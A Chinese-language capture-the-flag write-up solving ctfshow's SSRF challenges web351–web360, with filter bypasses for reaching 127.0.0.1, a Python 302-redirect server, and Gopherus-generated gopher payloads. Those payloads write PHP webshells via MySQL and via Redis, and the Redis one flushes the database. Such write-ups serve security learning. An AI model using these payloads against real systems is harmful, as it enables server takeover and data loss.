ctfshow_SSRF

web351

靶机的/flag.php可以访问，会返回报错。

url = http://127.0.0.1/flag.php

web352

它的正则检查是错的，只给了正则规则没给要搜的对象，所以上个题的payload可以继续用。

web353

不能用localhost和127.0.0.1，提供一点payload：

进制绕过 		url=http://0x7F000001/flag.php 等效于127.0.0.1
0.0.0.0绕过	 url=http://0.0.0.0/flag.php
特殊的地址0	   url=http://0/flag.php
还有			 url=http://127.1/flag.php
还有			 url=http://127.0000000000000.001/flag.php

来源是：CTFSHOW-SSRF篇 - LinkPoc - 博客园 (cnblogs.com)，感恩。

web354

过滤了01，可以提供一个域名解析到127.0.0.1

http://safe.taobao.com/
http://114.taobao.com/
http://wifi.aliyun.com/
http://imis.qq.com/
http://localhost.sec.qq.com/
http://ecd.tencent.com/
http://sudo.cc/

web355

url=http://0/flag.php

web356

同上

web357

ip必须合法并且不在私有ip和保留ip范围内。

自己的vps提供一个302跳转到127.0.0.1就好。

from http.server import BaseHTTPRequestHandler, HTTPServer

class MyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == '/redirect':
            self.send_response(302)
            self.send_header('Location', 'http://127.0.0.1/flag.php')
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b'404 Not Found')

def run(server_class=HTTPServer, handler_class=MyHandler, port=80):
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    print(f'Starting server on port {port}...')
    httpd.serve_forever()

if __name__ == '__main__':
    run()

web358

正则匹配的要求是http://ctf.xxxxxshowxxxx是任意值。

Payload: http://ctf.:123@127.0.0.1/flag.php?show

后面通过问号将show设置为get请求的键比较好理解，@符号的作用如下：

在URL中，@符号通常用于在基本认证（Basic Authentication）中，将用户名和密码包含在URL中。这种用法的格式是：
http://username:password@hostname/path
在这个格式中，username:password 是登录所需的凭据，@ 符号用来分隔凭据和主机名。然而，这种做法在现代网络应用中不推荐使用，因为它容易导致安全问题，比如泄露用户凭据。

原来file_get_contents这个函数也支持http协议哇

web359

需要安装这个工具，python2的pip也需要装上。
git clone https://github.com/tarunkant/Gopherus.git
chmod +x install.sh
./install.sh
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py\n
sudo python2 get-pip.py
sudo ./install.sh
这就可以开始用了
python2 gopherus.py --exploit mysql
Give MySQL username: root                                                          
Give query to execute: select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/aa.php';
这里很容易打错，错一个字母就完蛋

Your gopher link is ready to do SSRF :                                                                                         
                                                                                                                               
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%61%61%2e%70%68%70%27%3b%01%00%00%00%01
将下划线后面的进行url编码后传入，木马就写入成功了。

web360

dict://127.0.0.1:6378有报错证明端口开着，这个是redis

url=gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

参考文章

CTFSHOW-SSRF篇 - LinkPoc - 博客园 (cnblogs.com)

CTFshow刷题日记-WEB-SSRF（web351-360）SSRF总结_ctf ssrf题型总结-CSDN博客